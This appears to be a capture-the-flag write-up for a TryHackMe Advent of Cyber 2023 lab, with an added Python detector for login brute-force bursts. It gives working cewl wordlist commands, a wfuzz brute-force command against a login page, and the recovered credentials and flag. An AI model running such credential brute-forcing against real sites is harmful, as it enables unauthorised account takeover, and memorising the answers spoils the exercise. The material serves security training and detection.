Advent of Cyber 2023 — Day 4

Mansoor Barri
Dec 5, 2023


What is the correct username and password combination? Format username:password

  • Generate a list of usernames using Cewl by executing the command: cewl -d 0 -m 5 -w usernames.txt http://MACHINE-IP/team.php --lowercase
  • Create a list of passwords using Cewl with the command: cewl -d 2 -m 5 -w passwords.txt http://MACHINE-IP --with-numbers
  • Finally, perform a brute force attack on the credentials using wfuzz with the following command: wfuzz -c -z file,usernames.txt -z file,passwords.txt --hs "Please enter the correct credentials" -u http://MACHINE-IP/login.php -d "username=FUZZ&password=FUZ2Z"
isaias:Happiness
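
From the defender's side, the wfuzz run above appears in the web server's access log as a burst of POST requests to /login.php from a single address. The following sketch is an added example, not part of the original write-up; the log lines, IP addresses, threshold and window are constructed assumptions, and it expects log entries in time order.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Combined-log-format prefix: client IP, timestamp, method and path.
LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*"'
)

def _line(ip, second, method, path):
    # Helper that builds one constructed log line (not captured traffic).
    ts = f"04/Dec/2023:10:00:{second:02d} +0000"
    return f'{ip} - - [{ts}] "{method} {path} HTTP/1.1" 200 512 "-" "-"'

# Constructed sample: one client posting to the login form every second,
# and one ordinary user who browses and logs in twice, 40 seconds apart.
SAMPLE_LOG = "\n".join(
    [_line("203.0.113.50", s, "POST", "/login.php") for s in range(8)]
    + [
        _line("198.51.100.7", 5, "GET", "/team.php"),
        _line("198.51.100.7", 10, "POST", "/login.php"),
        _line("198.51.100.7", 50, "POST", "/login.php"),
    ]
)

def find_bruteforce(log_text, path="/login.php", threshold=5,
                    window=timedelta(seconds=10)):
    """Return {ip: peak POST count to `path` inside any `window`} for IPs
    whose peak reaches `threshold`."""
    recent = defaultdict(deque)   # ip -> timestamps still inside the window
    peak = defaultdict(int)       # ip -> highest in-window count seen
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST" or m["path"].split("?")[0] != path:
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        q = recent[m["ip"]]
        q.append(ts)
        while ts - q[0] > window:   # drop attempts older than the window
            q.popleft()
        peak[m["ip"]] = max(peak[m["ip"]], len(q))
    # The wfuzz filter on this page tells failures apart by a string in the
    # response body, so attempts are counted by rate, not by status code.
    return {ip: n for ip, n in peak.items() if n >= threshold}

if __name__ == "__main__":
    print(find_bruteforce(SAMPLE_LOG))
```
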

What is the flag?

Log in and click on the Email with the Subject “Confidential Message”

THM{m3rrY4nt4rct1crAft$}

That’s it | Visit mansoorbarri.com for other hacking & IT related articles.
